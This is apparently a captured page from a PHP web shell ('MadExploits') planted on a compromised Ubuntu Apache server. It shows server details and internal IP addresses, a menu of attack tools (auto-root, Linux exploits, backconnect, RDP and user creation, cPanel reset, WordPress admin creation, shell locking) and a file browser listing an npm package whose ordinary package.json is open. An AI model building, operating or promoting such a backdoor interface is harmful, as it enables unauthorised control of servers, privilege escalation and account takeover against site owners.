Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
motion-dom /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
drwxr-xr-x
LICENSE.md
1.07
KB
-rw-r--r--
package.json
1.31
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "motion-dom", "version": "12.23.23", "author": "Matt Perry", "license": "MIT", "repository": "https://github.com/motiondivision/motion", "main": "./dist/cjs/index.js", "types": "./dist/index.d.ts", "module": "./dist/es/index.mjs", "sideEffects": false, "exports": { ".": { "types": "./dist/index.d.ts", "require": "./dist/cjs/index.js", "import": "./dist/es/index.mjs", "default": "./dist/cjs/index.js" } }, "dependencies": { "motion-utils": "^12.23.6" }, "scripts": { "clean": "rm -rf types dist lib", "build": "yarn clean && tsc -p . && rollup -c && node ./scripts/check-bundle.js", "dev": "concurrently -c blue,red -n tsc,rollup --kill-others \"tsc --watch -p . --preserveWatchOutput\" \"rollup --config --watch --no-watch.clearScreen\"", "test": "jest --config jest.config.json --max-workers=2", "measure": "rollup -c ./rollup.size.config.mjs" }, "bundlesize": [ { "path": "./dist/size-rollup-style-effect.js", "maxSize": "2.9 kB" }, { "path": "./dist/size-rollup-motion-value.js", "maxSize": "1.8 kB" } ], "gitHead": "237eee22464039152dd3acf122496503b3f3a5da" }
Close